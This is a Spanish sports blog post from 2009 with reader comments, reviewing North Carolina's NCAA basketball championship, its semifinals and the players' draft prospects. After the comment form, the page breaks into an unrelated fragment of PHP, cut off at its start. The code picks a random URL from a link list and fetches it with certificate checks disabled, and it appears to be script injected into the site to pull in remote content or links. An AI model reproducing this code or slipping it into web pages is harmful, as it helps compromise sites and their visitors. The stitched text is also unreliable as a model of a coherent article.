Los Tar Heels, campeones de la NCAA

07 de April de 2009 por Viva_Dirk

Viva_Dirk & Txusma

4 años después de su último título North Carolina hizo valer todos los pronósticos y se impuso en la final a Michigan State, que había eliminado sorprendentemente al otro favorito al título, UConn. De esta manera UNC, liderados desde la banda por Roy Williams, suma su quinto título desde 1957.

Repasemos primero cómo fueron las semifinales:

UConn VS Michigan State

Como hemos comentado, los Huskies llegaban a la Final Four compartiendo favoritismo con North Carolina. En su partido frente los Spartans disponían de mayor rotación y de jugadores con mucho mas nombre, mientras que los de verde llegaban con el poder del grupo como punto fuerte. El partido transcurrió igualadísimo durante los 15 primeros minutos de la primera parte, con un AJ Price muy desacertado y un Thabeet sin apenas encontrar bola. De hecho, eran los aleros Adrien y Robinson los que mantenían al equipo como podían. De esta manera el partido transcurría como querían los de Izzo y fueron estos quienes tomaron una ligera ventaja que mantuvieron hasta el descanso.

En la segunda parte despertó el pívot de 2.21 para demostrar que no sólo sabe defender. El tanzano hizo un buen uso del tablero, anotó tiros libres e intimidó. Pero no encontró en ningún momento la colaboración de Price, que no consiguió zafarse de la defensa de los Spartans y acabó el partido con un escalofriante 5 de 20 en tiros, actuación que puede hacerle caer en el draft pese a su gran torneo. Los de Michigan defendieron su ventaja y respondieron sin pestañear a cada intento de los Huskies por acercarse. Lucas desde la línea de 3, Morgan defendiendo a la vez que salía como una bala en contraataque y Summers con una de las acciones más espectaculares de todo el torneo sentenciaron a su rival. Saltaba la sorpresa en la primera semifinal.

North Carolina VS Villanova

Ya fuese por lo acontecido en la otra semifinal o por simple superioridad, los Tar Heels no se dejaron sorprender en ningun momento y mediada la primera parte ya disponían de una ventaja superior a los 10 puntos. La mejor pareja de guards del país no necesitó casi ayuda para tumbar a los Wildcats, ya que entre Lawson y Ellington anotaron 42 puntos, capturaron 16 rebotes y repartieron 12 asistencias. El primero gana puestos en este draft y el segundo se confirma como un top-10 para el del año que viene. A su lado tuvieron al omnipresente Hansbrough con 18-11 y 4 robos. Sabemos que domina este nivel pero la duda sobre su rendimiento con los mayores parece eterna.

Villanova no pudo hacer demasiado salvo dar la cara, pero su desacierto en el tiro fue absoluto: un 33% en tiros de campo y un 5 de 27 en tiros de 3. Actualmente sus jugadores apuntan más a ganarse bien la vida en Europa que a buscarse un hueco en la NBA, y seguro que se llevan un muy buen recuerdo de su paso por la universidad.

La gran final: North Carolina vs Michigan State

Aún con la boca pequeña, debido a su sorprendente victoria frente a UConn, nadie creía que Michigan State tuviera muchas opciones de llevarse el título frente a los todopoderosos Tar Heels. A pesar del gran apoyo que recibieron desde las gradas, los de Tom Izzo sólo aguantaron 4 minutos, los necesarios para que UNC obtuviera una ventaja de 10 puntos. Liderados por Ty Lawson (21 puntos, 8 robos, 6 asistencias y 4 rebotes), Wayne Ellington (19 puntos, 7 de 12 en tiro) y Tyler Hansbrough (18 puntos, 7 rebotes), North Carolina no dio en ningún momento opciones a su rival y ya a la media parte (55-34) el partido estaba sentenciado. Al final 89-72 y una sensación de superioridad casi insultante.

Comenta

7 comentarios a esta entrada

  1. JJ5 dice:
    #1

    Menudo trío calavera el de NC…

    La pena es que desde el minuto 5 se veía sentenciado el choque, pero mereció la pena.

    Por cierto, ¡Obama acertó! jajaja

      Citar

  2. Dantley2 dice:
    #2

    Mucho han hecho los de Michigan St. Es digno de aplauso como se lo han currado hasta la final.

    La verdad es que ha tenido poco glamour este año. Y tampoco veo que los tres buenos de North Carolina tengan un carrerón en la NBA. Pero bueno, es lo que hay con la NCAA, años mejores y años peores como éste.

      Citar

  3. JJ5 dice:
    #3

    Da rabia que jugadores increíbles como Ellington que lo son todo en NCAA luego se estrellen al llegar al basket profesional.

    Hubo dos jugadas de Ellington saliendo de bloqueo que son para enamorarse del baloncesto.

      Citar

  4. Txusma dice:
    #4

    El caso de Psyco-T es curioso. Este año ha ganado la NCAA pero aparece mas abajo en los mocks q el año pasado. Creo q nadie confia en q sea algo más que un jugador de rotacion en la NBA o un super crack en Europa (a lo Felipe Reyes?). En todo caso, q le qiten lo bailado.
    Los numero de Lawson en la final son espectaculares…

      Citar

  5. Viva_Dirk dice:
    #5

    Yo no creo que Ellington vaya a estrellarse en profesionales. Dependiendo de en que posición salga elegido y que confianza le den puede ser desde un All-Star habitual hasta una estrella en Europa tipo Bullock. Y desde luego Lawson hará carrera en la NBA.

    Si pudimos ver a un Ed Davis que será un pick muy alto en el draft del año que viene o incluso de 2011.

    Y a lo largo del torneo hemos podido ver de todo, en cuanto a calidad de la Final Four no creo que tenga nada que envidiar a la del año pasado donde ganó un equipo sin estrellas como Kansas, aunque estuviese Derrick Rose en los Tigers.

      Citar

  6. Dantley2 dice:
    #6

    No, si la final four del año pasado acabo siendo un poco patatera salvo la emoción final, pero es lo que digo, le ha faltado el glamour de los nombres del año pasado.

    Ed Davis tiene muy buena pinta, si mantiene la progresión top-10 fijo y más quizá

      Citar

  7. aro_pasado_no_newtoniano dice:
    #7

    ¿Thabeet ?Olajuwon?

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>